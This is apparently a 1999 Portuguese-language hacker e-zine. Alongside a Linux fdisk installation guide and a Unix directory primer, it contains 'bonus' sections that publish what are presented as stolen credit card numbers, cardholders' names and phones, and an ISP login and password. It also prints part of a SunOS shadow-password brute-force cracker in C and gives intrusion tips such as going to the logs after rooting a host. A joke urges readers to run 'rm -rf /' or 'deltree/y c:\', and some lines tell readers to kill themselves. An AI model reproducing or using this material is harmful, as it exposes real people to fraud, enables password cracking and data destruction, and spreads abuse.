EM REDE.

4.) METODO DE INSTALACAO: ESCOLHA CD-ROM LOCAL
 
5.) CAMINHO DA INSTALACAO: 

 Vai perguntar  o que vc quer fazer
¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|  ¡======================¡              ¡==========================¡       |                        
|  |      INSTALAR        |     OU       |         ATUALIZAR        |       |  
|  ³======================³              ³==========================³       |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Você escolhe INSTALAR eh claro

6.) CONFIGURACAO DE DISCOS: EU ACHO MELHOR UTILIZAR O FDISK

============================== FDISK ======================================== 
             JANELA DO FDISK
¡++++++++++++++++++++++++++++++++++++++++++++++¡                                           
|                                              |   
|                                              |  
| ¡++++++++¡    ¡++++++++¡    ¡+++++++++¡      |    
| | PRONTO |    | EDITE  |    |CANCELAR |      |     
| ³++++++++³    ³++++++++³    ³+++++++++³      |    
|                                              |    
³++++++++++++++++++++++++++++++++++++++++++++++³

Agora no EDITE do FDISK delete a segunda partição(partição numero 2, que 
foi feita pelo fips)
Para ver o HELP do FDISK tecle ''?''.

Delete a segunda partição assim:

¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|  d                                                                        |
|  e(extended) ou p(primary) ? ===> ESCOLHA ''p'' PRIMARY                   |
|  Pergunta o nm da partição =====> ESCOLHA ''2'' o numero 2(dois)          |
|                                                                           |  
|                                                                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

               ¡³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³¡ ||
               |  RECAPITULANDO  VC  VAI  FAZER  ASSIM| ||
               ³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³ ||   
                                                        \/

¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|  d<ENTER>                                                                 |
|  p<ENTER>                                                                 |
|  2<ENTER>                                                                 |
|                                                                           |  
|                                                                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³


 Pronto vc já tirou a partição feita pelo fips??Pronto agora não se preocupe
com os dados contidos no Windows eles já estão salvos.

 Mas agora vc precisa de mais duas partições(Total de partições no final 
da instalação: 3<TRES>)que são a NATIVE  e a SWAP.Entao faça-as!

Faca uma partição SWAP(memória virtual) assim:

¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|  n (NEW PARTITION)                                                        |
|  e(extended) ou p(primary) ? ===> ESCOLHA ''p'' PRIMARY                   |
|  Numero da Partição =====> Vc bota ''2'' (Dois)                           |
|  First Cilinder(XX,YY) ==> Vc bota o numero que esta no lugar do XX       |  
|  Last Cilinder: vc bota(recomendado) ''+70Mb''                            |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

               ¡³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³¡ ||
               |  RECAPITULANDO  VC  VAI  FAZER  ASSIM| ||
               ³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³ ||   
                                                        \/

¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|   n<ENTER>                                                                |
|   p<ENTER>                                                                |
|   2<ENTER>                                                                |
|   XX<ENTER>                                                               |  
|   +70Mb<ENTER>                                                            |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³


Pronto Parabéns vc acabou de fazer uma partição SWAP para seu Linux, vc des
tinou 70 Mb para a memória virtual do Linux.

Agora vc tem que fazer uma partição Native para seu linux , vamulah!

 
¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|  n (NEW PARTITION)                                                        |
|  e(extended) ou p(primary) ? ===> ESCOLHA ''p'' PRIMARY                   |
|  Numero da Partição =====> Vc bota ''3'' (Três)                           |
|  First Cilinder(XX,YY) ==> Vc bota o numero que esta no lugar do XX       |  
|  Last Cilinder: vc bota(recomendado) ''+500Mb''                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³


               ¡³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³¡ ||
               |  RECAPITULANDO  VC  VAI  FAZER  ASSIM| ||
               ³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³ ||   
                                                        \/
¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|   n<ENTER>                                                                |
|   p<ENTER>                                                                |
|   2<ENTER>                                                                |
|   XX<ENTER>                                                               |  
|   +500Mb<enter>                                                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Pronto vc acabou de destinar 500Mb para a partição do Linux Native.

Depois disso tecle ''p''  e vai aparecer isso

¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|Device-boot   Begin   Start    End      Blocks       Id         System     |
|                                                                           |
| /dev/hda1  *   1       1      255      542416       6          Fat 32     |
|                                                                           |
| /dev/hda2 <-- 255     255     280       52416      92        Linux Native |
|                                                                           |
| /dev/hda3     281     281     827     1102752      83        Linux Native |
|                                                                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

********************************* ATENCAO ***********************************
1.)    Esse computador eh só um exemplo, claro que no seu sairá diferente :þ

2.)    Vc deve estar se perguntando : ''UAI!!! CADE O SWAP????¿¿¿¿¿''

O SWAP  esta ai hehehehehehehe eh esse com a setinha ( <-- ) vc vai ter que 
renomea-lo de NATIVE para SWAP, faca assim :



¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|   t (change partition type)                                               |
|   Pergunta o numero da partição: vc bota ''2''(dois)                      |
|   Ele pede o código da partição: escreva ''L''                            |
|   Vc vê o código e tecla ''82''                                           |  
|                                                                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³


               ¡³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³¡ ||
               |  RECAPITULANDO  VC  VAI  FAZER  ASSIM| ||
               ³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³ ||   
                                                        \/
¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|t<ENTER>                                                                   |
|2<ENTER>                                                                   |
|L<ENTER>                                                                   |
|82<ENTER>                                                                  |  
|                                                                           |                        
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Pronto as partições foram feitas com êxito, tecle ''w'' para sair e salvar
as modificações.

Pronto, vc fez as duas partições, agora o Ruindows roda junto com Linux beleza
Agora vamos continuar com a instalação.
                       
                JANELA DO FDISK
¡++++++++++++++++++++++++++++++++++++++++++++++¡                                           
|                                              |   
|                                              |  
| ¡++++++++¡    ¡++++++++¡    ¡+++++++++¡      |    
| | PRONTO |    | EDITE  |    |CANCELAR |      |     
| ³++++++++³    ³++++++++³    ³+++++++++³      |    
|                                              |    
³++++++++++++++++++++++++++++++++++++++++++++++³

Bote no ''PRONTO'' ai aparecera uma janela assim:


¡++++++++++++++++++++++++++ ATIVAR SWAP +++++++++++++++++++++++¡
|                                                              |
| Que partcicoes deseja  usar para SWAP , serao destruidos     |
| quaisquer dados existentes na particao escolhida.            |                                |
|                                                              |
|  Dispositivo      Inicio        Fim       Tamanho(k)         |
|                                                              |
| [] /dev/hda2       XX           YY          ZZ               |    
|                                                              |    
| [] Checar Blocos defeituos                                   |     
|                                                              |   
|  ¡++++++++¡        ¡+++++++++++¡                             |    
|  |   OK   |        | CANCELAR  |                             |    
|  ³++++++++³        ³+++++++++++³                             |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Bote em OK.... e depois aparecera uma janela assim:




¡+++++++++++++++++++ FORMATAR PARTCOES ++++++++++++++++++++++++¡
| Que particoes deseja formatar? Sugerimos fortemente que      |
| que formate todas as particoes de sistema incluindo / ,/usr  |
| e /var.Nao e necessario formatar o /home e a /usr/local      |
| se elas ja foram configuradas numa instalacao anterior.      |
|                                                              |
|                                                              |
| [] /dev/hda3                                                 |    
|                                                              |    
| [] Checar Blocos defeituos                                   |
|                                                              |
|                                                              |   
| ¡++++++++¡   ¡+++++++++++¡                                   |    
| |  OK    |   |  CANCELAR |                                   |    
| ³++++++++³   ³+++++++++++³                                   |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Bote em OK...e depois aparecera uma janela assim:

¡+++++++++++++++ COMPONENTES A INSTALAR +++++++++++++++++++++++¡
|                                                              |
|            ¡++++++++++++++++++++++++++++++++++¡              |
|            | []XXXXXXXXXXXXXXXXXXXXX          |              |
|            |                                  |              |   
|            | []YYYYYYYYYYYYYYYYYYYYY          |              |  
|            |                                  |              |
|            | []ZZZZZZZZZZZZZZZZZZZZZ          |              |
|            |                                  |              |
|            | [] Todos                         |              |
|            |                                  |              |    
|            ³++++++++++++++++++++++++++++++++++³              |    
|               [] Selecionar Pacotes individuais              |     
|                                                              |   
|  ¡++++++++¡        ¡+++++++++++¡                             |    
|  |   OK   |        | CANCELAR  |                             |    
|  ³++++++++³        ³+++++++++++³                             |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Oia como voce esta botando 500Mb pode botar o ''[] todos''
e se der erro ou se voce boto menos de 500Mb deixe os ''basicos''
ou seja os que foram automaticamente escolhidos.
Aperte em OK...e ai comecara a instalacao.


¡+++++++++++++++++++++++++ STATUS DA INSTALACAO +++++++++++++++¡
|                                                              |
|  Pacote: XXXXXXXXXXXXXXX                                     |
|  Tamanho: O normal eh 14cm duro se vc tiver menos que        | 
|          isso tah fudido!hehehee                             |
|  Sumario:YYYYYYYYYYYYYYY                                     |
|                                                              |
|    ||||||||||||||||||||||||||||||||||||||||||||||||||||      |     
|                                                              |
|                   Pacotes            Bytes        Tempo      | 
| Total:           XXXXXXXX            YYYYY        00:00      |                
| Completados:     ZZZZZZZZ            WWWWW        00:00      |              
| Restando:        KKKKKKKK            LLLLL        00:00      |
|                                                              |
|    |||||||||||||||||||||||||||||||||||||||||||||||||||       |
|                                                              |   
|  ¡++++++++¡        ¡+++++++++++¡                             |    
|  |   OK   |        | CANCELAR  |                             |    
|  ³++++++++³        ³+++++++++++³                             |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Ai vai instalar o linux....tenha paciencia e espere viu....va assistir
teletubies enquanto instala.

¡+++++++++++++++++++SENHA DO SUPERUSUARIO +++++++++++++++¡
|                                                        |     
|   ¡=============================================¡      |   
|   | SENHA: _________________________            |      |    
|   | REPITA: ________________________            |      |   
|   ³=============================================³      |   
|                                                        |  
|         ¡===========¡                                  |  
|         |  OK       |                                  |
|         ³===========³                                  |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Essa e a parte + importante da instalacao, o PoW! ve se bota uma 
senha descente neh kra! Se for pra vc botar senhas tipo:
123456
asdfgh
batata
abcdef
Eu le dou um conselho: SE MATE! E nem use o linux....
Ahhhhhhh sim pra vc lammo que nao sabe o que eh SUPERUSUARIO
SUPERUSUARIO=ROOT,  mas se vc nao souber o que eh ROOT, SE MATE tb!!!

¡+++++++++++++++++++++++++ INSTALACAO DO LILO +++++++++++++++++¡
|                                                              |
| Onde deve ser instalado o carregador de boot??               |
|                                                              | 
|                                                              |
| /dev/hda      <--       Registro principal de boot(MBR)      |
| /dev/hda3               Primeiro setor da particao de boot   |
|                                                              |     
|                                                              |                                       
|                                                              |              
|                                                              |
|                                                              |
|                                                              |
|                                                              |   
|  ¡++++++++¡        ¡+++++++++++¡                             |    
|  |   OK   |        | CANCELAR  |                             |    
|  ³++++++++³        ³+++++++++++³                             |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³

Aqui voce escolhera onde o LILO(LInux LOader) sera instalado, e melhor
voce instalar o LILO no /dev/hda , onde tem a setinha ( <-- ), porque 
sempre que voce ligar ou reeniciar seu computador o LILO perguntara se
vc quer ir pro linux ou pro Ruindows 95/98.


¡+++++++++++++++++++++++++ PARTICOES INICUAVEIS +++++++++++++++¡
|                                                              |
|                                                              |
| Dispositivo       Tipo de Particao         Padrao/Rotulo     | 
|                                                              |
| /dev/hda             Unknow          <-- o (*) tem k tar aqui|
| /dev/hda3            Linux Native     *      Linux           |
|                                                              |     
|                                                              |                                       
|                                                              |              
|                                                              |
|                                                              |
|                                                              |
|                                                              |   
|  ¡++++++++¡      ¡+++++++++++¡        ¡+++++++++++¡          |    
|  |   OK   |      |  EDITAR   |        | CANCELAR  |          |    
|  ³++++++++³      ³+++++++++++³        ³+++++++++++³          |  
³++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³
Oia.. aqui voce tera que botar um rotulo no /dev/hda, aperte no EDITE
e bote o nome que vc achar melhor (ex: Ruindows), e depois de feito isso
voce tera que mudar a inicializacao, o axterisco(*), se voce deixar como
esta o lilo nao se inicializara...para mudar a inicializacao das particoes
aperte F12.

Ps: No topico ''TIPO  DE PARTICAO'' e' normal tah ''UNKNOW'' mesmo.

Aperte em OK e o resto eh com vc porque vc tera que  configurar o linux 
ao jeito de seu computador(ve se pelo menos faz isso sozinho neh!)
E eu tambem nao sou Ninja nem Discipulo de Iomar Cardoso, pra ficar
adivinhando configuracao de computador de ninguem! :þ

¡============== QUALQUER DUVIDA ME CONTACTE=============================¡ 
| E-mail: thanath0s@brasnet.org                                         | 
|                                                                       | 
| ********** LEMBRE-SE *****************                                | 
|  Perguntas lammer = Resposta cretinas                                 |
|  Perguntas Descentes serao bem vindas                                 |  
|  PoW! Se vc for lammer sufuciente pra nao conseguir intalar o linux   |                      
|  depois desse mole todo,ou se der algum erro nao exite em me mandar   |
|  um E-mail                                                            |
³=======================================================================³
ValewZ galera!
Especialz Thankz to:
Minha mamae que paga a conta telefonica :þ 
Toda Galera Do   Forbidden Corporation 


Made by ThAnAtH0s que pertence a Forbidden Corporation
Copright © 1999 All Rights Reserved

"NAO COPIE ISSO SEM MINHA AUTORIZACAO OU VERA A IRA DO DEUS ROMANO DA MORTE"



-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
                .-----------------------------------.
||=-=-=-=-=-=-=-|5. Estrutura e terminacoes do Unix |=-=-=-=-=-=-=-||
                |___________________________________|
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
By F0rBiDDeN                                                           
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ 


DaE D00dz!       

Essa eh minha primeira materia aki na FCorp. Tipow, saco + de hack, mas tb
sou curioso em c/h/vrii/eletronica. Quem sabe daki a uns meses toh escrevendo
de algo alem de hack hehehe.

Bem, eu gosto de fazer uma materia somente se eu souber bastante sobre o assun
to, senao provavelmente vai fica muito paia. Essa materia aih embaixo tah meio
fraquinha, mas pelo menos jah eh algo. tenho certeza q o zine vai ir melhoran
do com o tempo, portanto se vcs se desentusiasmarem com esse continuem pegando
pq os proximos muito provavelmente serao melhores.

Tipow, isso meio basico, mas pra quem ainda nao teve contato quase nenhum
com unixes axo bom dar uma olhada nessa materia, pq dah uma ideia legal de
onde e o q eh cada coisinha do unix(vo me basear no linux pra fazer a estrutu
ra.)

Esse negocio de estrutura e terminacoes qqueh maneh deve saber, mas pr0s + ma
nehs q ainda nao sabem bulhufas do unix tah aih 1% sobre esse assunto:

Antes de mais nada, Unix EH DIFERENTE de Linux, ou seja, nao sao iguais.
Todo Linux eh um Unix, mas nem todo Unix eh um Linux.

Um diagramazinho pra vcs verem meio:

      .________________.
     /                  \
   /  Linux               \
 /                *BSD     \
|          SunOS            |
|                           |<- CONJUNTO Unix
|   DUnix          HP-UX    |
 \                         /
   \          IRIX        /
     \.________________./

Viram a diferenca ? Nao ? Fuckoff......

Bem, como vcs ja sabem, todo SO comeca no diretorio /(root). No unix nao eh di
ferente. Contudo daih vai sair uma gama de diretorios q vcs devem(pelo menos
deveriam) saber.

Vo colocar aki um diagramazinho pra ilustrar melhor pros retardados:


/------/bin
 ------/etc
 ------/home
 ------/root
 ------/tmp
 ------/dev
 ------/var
 ------/lib
 ------/incoming
 ------/ftp
 ------/mnt(alguns)
 ------/sbin
 ------/usr
 ------/misc
 ------/log
 ------/man(alguns)
 ------/install(alguns)
 ------/boot
 (e muitos outros. Soh o zipslack tem + de 25 acho)

vamu pegar cada um desses e expricar mei¢:

/bin

o /bin vem de binaries, e eh onde fica os arquivos executaveis basicos do SO.
Fazendo uma podre comparacao, eh como se fosse o /windows e /windows/system do
rwin e o /dos do ms-doz. Lah tem os progs q todo unix tem e nao sao do kernel(
cat, por exemplo, eh do kernel, jah o mount nao)

/etc

Bem, o /etc eh onde fica os arkivos de configuracao do unix(nisso se inclui o
passwd e o shadow(argh)), lah fica o tao falado hosts.alow, hosts.deny,
protocols, XF86Config etc etc etc heheh.

/home

Diretorio local(home) dos usuarios q compartilham a makina.

/root

O diretorio do superusuario q por acaso se chama root.

/tmp

O /tmp vem de temporary, q quer dizer temporario em portugues. E lah q ficam
os arquivos temporarios e o lixo do unix. Eh limpado cada vez q o unix eh rei
niciado

/dev

Vem de devices, q em portuges significa ferramentas. Eh como se fosse os drive
rs do rwin. Lah tem os drivers, por exemplo, do modem(cuaX), do mouse(sttyX),
etc etc etc. Tem + a ver com os dispositivos do hardware do maluko.

/var

Informacoes Variaveis(Nao encontrei melhor definicao)

/lib

Libraries. Comparando com o o rwin, eh onde fica os .dll . Sao os arquivos
q sao usados frequentemente por outros progs.

/incoming

Em portugues quer dizer "esta vindo", eh um diretorio 777(permission to all),
onde qqueh maneh pode ler, executar e mandar arkivos pra esse diretorio.

/ftp

File Transfer Protocol. Qquer lam0 sabe disso. Eh onde vc cai qdo vc se conecta
pro ftp do coitado. Lah tb tem o /etc, /bin, /dev etc etc etc. Eh como se fosse
o playground dos lam0s, q pensam q estao no diretorio root do cara e na verda
de so estao mesmo dentro de um diretoriozinho q simula isso, dando pro root se
matar de dar risada vendo os lam0s se divertindo com a propria merda. Contudo,
a partir desse diretorios os manehs q sabem de algo conseguem partir pro diret
orio root e, aih sim, pegar as verdadeiras senhas e fazer algo digno. Outra co
isa q se pode fazer eh mandar arkivos pelo ftp e executar algum exploit q abra
alguma porta ou lhe de algum "poder" especial.

/mnt

Mount(montar), eh onde fica alguns hardwares q foram montado por algum usuario
(heheh nem sempre eh o root, sempre tem algum esperto.....) Eles sao tempora
rios.

/sbin

vide /bin

/usr

Users(usuarios). Por exemplo, se tem o usuario maneh, esse cara, qdo se conecta
r por telnet, por exemplo, normalmente vai cair no diretorio /usr/maneh. Lah
o maneh vai guardar os arkivos importantes dele para q o root possa ve-lo hehe
heheh. Se assemelha LEVEMENTE com o /home

/misc

Miscellaneous. Onde fica os arquivos extras, miscelaneos.

/log

Log. Onde ficam os logs dos usuarios(inclusive o root). Lah tem escrito o q
cada usuario fez e qdo fez e onde fez. Eh o primeiro diretorio q o invasor de
ve ir depois q rutiar o host, e o primeiro q o sysadmin deve ir depois q ver
sua makiva invadida hehehe

/man

Manual. Eh onde ficam as man pages

/install

Por exemplo, vc coloca o netscape lah nesse diretorio e da um boot no unix.
Durante o booting ele verifica se existe algum arkivo no /install, e se tem
ele tenta instalar o aplicativo

/boot

Sao os arquivos estaticos de boot de inicializacao(o boot-loader)


Terminacoes do Unix:

.c

Sao os arkivos q tao em na fonte da linguagem de programacao C.
Compila pelo cc ou pelo gcc e roda.

.tar

Tah compactado pelo tar. Roda o untar e executa o prog

.gz

Compactado pelo gzip. Gzip -d arkivo e roda o prog

.tar.gz

vide .tar e depois .gz

.arkivo

Tah oculto

arkivo.

Eh um executavel. digita arkivo ou ./arkivo pra rodar.

-----------

Bem, tah aih o basico do basico. Se num gostaram, mande um mail digitando
deltree/y c:\ no seu doz ou rm -rf / no seu unix. Com certeza vou gostar
do seu mail q ce vai me mandar !!!



                        $==================$ 
   ////////////////\    | 6- Lammah do Mes |    /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $==================$    \/////////////// 

     Hahahahahahaha essa e a parte mais engracada do zine..pra vc ver kto
de lammo existe nesse mundo...aqui vamos destakar os lammeRzoes mesmo..
tipo o desse mes e meu colega de ingles....vo te conta a historia....
Num dia de Terca feira , ia ter teste oral de ingles ai eu resolvi nao 
faltar,como a  professora esta do lado de fora  fazendo o teste oral com uns
dos meu colegas a galera toda tava conversando...ai eu aproveitei a chance de
jogar uns papo em Tami ( Aiaiaiaia uma japonezinha linda,um tezaozinho,8 seri 
 e toda jeitozinha,hehehe ela arrazou meu coracao)ai tava lah botando o meu
GOGO DE OURO pa funcionar tava jogando uns papo descente(Tavendo Bl4ck! naum 
e so vc que tem rola de mel naum viu ?)ai comecamos a falar de internet, como
ela e uma menina "normal" disse que entrava no mirc so pra conversar com otras 
pessoas mesmo,ai esse lammerZao se enfiou na conversa( o kra e tao lammer ki
eu neim sei o nome, na proxima edicao eu digo, e vo dizer o nick delle tb)ate
ai tudo bem pois ele naum tinha falado neuma besteira, ai kdo eu falei pra 
Tami sobre as parada de firewall do japao..ai o lammerZao pulo da cadeira e
me pergunto : 
<lammi>    E NetBus  e ? 
E eu morrendo de vontade de dar risada falei com muita naturalidade :
<Eu>   Coleh Maneh NetBus rapa!!
<lammi>  Ahhh Pensei que fosse porque eu sou hacker e fico invadindo 
por netbus, e eu sou cruel pois apago tudo do pc do cara!!!
Rapaiz eu nao consegui me conter dei uma risada mais CONSEGUI me controlar e
disse: 
<EU> P0000 ki bom ......
E nisso a aula jah tinha acabado e quando eu tava saindo ele veio e minha 
direcao e me abordou perguntando: 
<lammi>  Vc e hacker tb ? 
E eu falei:
<Eu> Nao rapa esses hackers saum muito maus tenho medos desses caras
e ele retrucou:
<Lammi> E bom mesmo , nos somos perversos . Tchau tenho que ir 
 
 auheuhauhaeahuhaeuhaeuhaeauheuhae e fui andando do acbeu pra casa rindo auha
uhauhauha kem me via na rua pensava ki eu tinha dado um pau na massa !! auheuh
euuheuheauhae.....pra vc neh galera o kto de existe de lammo no mundo, mais eu
nao to falando de lammo naum.....toh falndo de lammeRZao....dakeles bem lammer
que usa o BO  e o NB se axa o rackeZAo e na verdade e um LaMMeR de marca maior



Ps: A giria "pau na massa" e uma giria ai dos makonheiros que signifika 
fumar maconha.
 
valew pessual ciul8.






                        $==================$ 
   ////////////////\    | 7- Opiniao       |    /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $==================$    \///////////////

   Aqui e o lugar onde vc pode meter o pau e kker coisa, mais vc tem que ter
   argumentos concretos e naum meter o pau so porque nao gosta...se vc ker
   meter o pau em alguem ou em algo mande sua  opinao pa nois.




>>>>>>>>>>>>>>>>>[ Uma nota sobre etica hacker ] <<<<<<<<<<<<<<<<<<<<<<<<<<<<



Ae cambada, vo da um ultimo comentario sobre esse assunto pra nunca mais falar
nisso na minha vida. 

Cansei desse negocio de <voz de bicha> etica hacker.....

Cada um q queira como quiser, num toh nem aih pra vc infeliz q fudeu ou nao com
o hd de um lammer e se diz o hackz0rzao. Num toh nem aih se vc destruiu tudo
do centro de pesquisa contra os hemofilicos, num toh nem aih se vc se acha o
hacker e nao eh nada disso q tah falando, num toh nem aih se vc soh sabe nukar,
num toh nem aih se vc hackeou ou nao a 2600, mum toh nem aih, num toh nem aih.

Metam uma coisa na cabeca: etica hacker nao existe.

Dane-se se o pessoal gay fica falando q tem etica pra isso ou akilo. Ouviram
bem ? FODAM-SE ! Etica nao existe, so vc sabe o q vc realmente eh, cada um
tem sua etica e quem faz e vc mesmo, e nao os viadinhos que ficam tentando
lhe influenciar. Se alguem lhe dizer q pra ser hacker precisa ser isso e seguir
tal coisa, manda ele tomar no meio do cu, pq num tem nada a ver isso. EU sou
mais EU assim como VC eh mais VC !

By F0rBiDDeN



                        $==================$ 
   ////////////////\    | 8- C00l Infoz    |    /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $==================$    \///////////////


=======================###################=================================
======================# PEQUENAS NOTAS   #================================
======================####################=================================



P4g3 d0 m35:...................................... www.fcorp.cjb.net(hehe)
H4ck0 d0 m35:..... O criador do virus Melissa(mora em nova jersey e tem 30 ano
                   s, eskeci o nome do coitado q vai pegar 10 anos de cadeia)
14m0 d0 m35:...................................... Vide Materia nº 6
P50g d0 m35:...................................... G3n1u5 2.5
P50g 14m0 d0 m35:................................. NB 3 b0







                        $==================$ 
   ////////////////\    | B O N U Z  [ 1 ] |    /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $==================$    \///////////////




Pra alguns lamerz essa eh a melhor parte da zine, pq ? Simplesmente pq em 
toda ediçao da 'Forbidden Corporation Zine' botaremos um BoNuz especial aki,
+ afinal... que BoNuZ eh esse ? Sao numeros de CC/CPF/CGC/PASS que todo 
lamer adoraria gravar em um DocumentoTexto e imprimir p/ seus coleguinhas 
falando que pegou no CPU de um kra pelo NetBuz ... eh, por incrivel que pare
ça existem bostinhaz como esse vivendo ... mais isso por pouco tempo, poiz 
chegamos p/ acabar c/ eles e c/ vc que se axa o Hack0 soh pq conseguiu um IP
 na BrasIRC! Entaum .... ti cuida pq estamos te observando agora  m0-0m ;P

|||| Mandic Pass |||||

Login: anrv
Pass:  32363887501

|||||  CC  |||||  

FRANCISCO MOURA SANTOS
TEL.:347-4670
Nº 376441322821002
Val.: 05/99




                        $==================$ 
   ////////////////\    |   B O N U S [2]  |    /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $==================$    \///////////////


Another hot CC's numBas.......very very hoT!!!!! Antencao, nao me resposabi
lizo pelo k vc vai fazer seu lammo! E se vc for dono desse CC va toma no 
meio da Xibata....e muito cuidado no lugar onde vc deixa o numero do seu CC
ve se naum dah mole.................. ;)



                ##################################                 
                ##########  CC NUMBAS   ##########      
                ##################################                   


################
## CREDICARD  ##
################

Nome do Coitado: Cassiano Eduardo Magalhaes ( ehehehe ele e sobrinho de mal
vadeza....hahahahah cuidado com ele)
Numero do CC: 5493803705920247
Telefone do Coitado: (071) 358-5296
Validade: 04/99


################
### SOLLO    ###
################

Nome do coitado: Viviane Camandaroba (pÔÔÔÔÔÔ.....ki nm TriZZaRRO)
Numero do CC:  50162708382913017
Telefone do Coitado: (071) 35801336
Validade : 04/99


################
## MASTERCARD ##
################


Nome do Coitado: Athila A. M. Santos
Numero do CC: 5390275131070273 
Telefone do Coitado: (071) 3821039
Validade: 04/99


#################
###   AMEX    ###
#################

Nome do Coitado: Jose Mario Santos Gomes
Numero do CC : 376420576761007
Telefone do Coitado: (071) 2485930
Validade: 04/99 



                        $==================$ 
   ////////////////\    |   B O N U S [3]  |    /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $==================$    \///////////////

 Ai esta mais um "presentinho" um codigo font de um Desencryptador de senhas
 feito em C ... pa voce deixar rodando ai na sua shell.....se vc naum sabe
 vc tera que compilar esse code...... use o commando cc  Nm.c -o nm   e pra
 executar ./nm ........vc tb pode usar o gcc.....eu tu do a mesma bosta mesmo!!! ;)
(No caso vc fara assim cc shcrack.c -o shcrack )

                Source do DESENCRIPTADOR DE SENHAS!
            
Atencao! Essa e a fonte de um desencriptador de senhas do arquivo shadow padrao 
SUNOS. O desencriptador e um programa que apartir de uma wordlist e um arquivo
com  as senhas encriptadas ( e claro) recria o valor dos codigos dando 
assim o login com seu respectivo password.

Corte a linha abaixo e cole em um arquivo vazio, para isso use um
editor de textos, logo apos compile ele.
Nao fomos nos que fizemos, devemos creditos a The Shining/UPi
(UK Division)


---CORTE AQUI----shcrack.c------------------------------------------------------

/* Program   : Shadow Crack
   Author    : (c)1996 The Shining/UPi (UK Division)
   Date      : Released 12/4/96
   Unix type : Somente para arquivos shadowed do sistema SUNOS */

#include <stdio.h>
#include <pwd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>

#define WORDSIZE 20     /* Tamanho maximo da palavra */
#define OUTFILE "data"  /* Arquivo que armazena info. da conta crackeada */

void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrupts( void ), cleanup();


char *logname, *comment, *homedir, *shell, *dict, *mode,
     *pwfile, *pwdauth();
struct passwd *getpwnam(), *pwentry;
extern char *optarg;
int option, uid, gid;


int main( int argc, char **argv )
{
disable_interrupts();
system("clear");

if (argc < 2) {
printf("Shadow Crack - (c)1996 The Shining\n");
printf("SUNOS Shadow password brute force cracker\n\n");
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
printf("-d[dictfile]\n\n\n");
printf("[b] is burst mode, scans pwfile trying minimum\n");
printf("    password strategies on all i.d's\n\n");
printf("[i] is mini-burst mode, scans pwfile trying both\n");
printf("    userid, gecos info, and numbers to all i.d's\n\n");
printf("[f] is bruteforce mode, tries all above stategies\n");
printf("    as well as dictionary words\n\n");
printf("[pwfile]   Uses the password file [pwfile], default\n");
printf("           is /etc/passwd\n\n");
printf("[loginid]  Account you wish to crack, used with\n");
printf("           -mf bruteforce mode only\n\n");
printf("[dictfile] uses dictionary file [dictfile] to\n");
printf("           generate passwords when used with\n");
printf("           -mf bruteforce mode only\n\n");
exit(0);
}


/* Get options from the command line and store them in different
   variables */

while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
 switch(option)
 {
   case 'm':
	   mode = optarg;
	   break;

   case 'p':
	   pwfile = optarg;
	   break;

